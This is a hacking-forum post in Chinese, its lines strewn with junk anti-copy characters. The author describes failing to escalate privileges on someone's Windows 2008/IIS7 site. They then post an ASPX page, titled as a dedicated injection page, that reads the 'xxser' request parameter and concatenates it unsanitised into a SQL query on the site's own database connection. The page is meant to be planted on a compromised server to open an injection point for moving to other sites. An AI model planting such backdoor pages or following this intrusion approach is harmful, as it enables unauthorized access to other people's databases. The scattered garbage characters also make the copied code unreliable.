昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。, t3 Y1 r, z' l6 C
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
, B& {& W' o# V1 u" I9 x5 p代码量不多,自己写个拉倒了。烦死了。
& J3 k( ]" s/ s" e. A) a7 Z+ Y; w* Y* x/ B4 Z4 p. z. l' W
9 ~ R* G- p8 ^- l" i6 m* P<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">8 h& B9 h, N- D# B
<html xmlns="http://www.w3.org/1999/xhtml">
2 p# m! P/ F6 g. ~<head runat="server">
# r% e$ c- z, X% Z1 g <title>暗影aspx构造注射专用页面</title>
! h5 G/ n" e& @# ]! O</head>
; [! z8 f& ~4 V0 o9 ~6 S- p<body>
6 h u- ~: G5 B# u o <form id="form1" runat="server">
% T3 d. P Y Q- S( M5 e/ T <div>
( K: n$ ~' ?, [- @. Y <script language="c#" runat="server">/ |9 Z5 f& u1 `6 R
T1 [, E0 V6 _7 t a% H
void page_init(object sender, EventArgs e)
$ }4 h6 g9 {& N+ n: P# @' Z# z" b1 U {4 z. T. D# D9 G1 x6 L$ x) q
5 T! i" R; C% m& O. T5 ^
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();0 S* A7 O* w+ f+ }
% U; J) W7 ~" H3 _* Q1 |. h, @ y conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
" g; }" z. d* g5 ]) B4 R conn.Open();
& J0 U4 a( z3 E- s0 Y
# D) d, w, ]+ p$ H" X; W6 h- O string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
! s: S0 D4 z8 B) t. b
' L Q2 E0 H9 C. j System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
6 \" j) ^4 q3 m; y: K: k% e$ S int x = command.ExecuteNonQuery();
9 u D2 @& W9 q( @* Z Response.Write(i+"\n");- W6 H0 n2 {) {" G4 ~4 w U
Response.Write(x);
* j4 ]6 ~5 J) B- m" S V conn.Close();! m& A! ]5 P1 ?1 @$ k
}
+ W$ T- ^* w: P I: A
* p7 P( K3 |* h! ?* c/ `( E: l2 h# u </script>5 |. h' q+ r* W( l2 ~' y
</div>9 v+ X5 L0 {( h/ v, p
</form> h% s$ n* @: Z/ T! F
</body>1 {4 H) b2 ?/ Y5 t- ]
</html>0 y: A' _: y; j" c
|